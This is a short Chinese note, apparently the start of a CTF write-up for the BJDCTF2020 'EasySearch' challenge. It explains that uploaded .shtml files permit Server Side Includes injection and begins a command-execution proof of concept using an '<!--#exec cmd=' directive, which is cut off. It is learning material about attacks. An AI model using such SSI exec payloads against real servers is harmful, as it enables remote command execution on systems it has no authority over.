BJDCTF2020-EasySearch&&SSI

之前文件上传只知道可以上传.shtml文件,但是不知道怎么利用. 现在才知道这个叫 服务器端包含注入 https://www.secpulse.com/archives/66934.html Server Side Includes 服务器端包含 命令执行poc 1<!--#exec cmd=" ......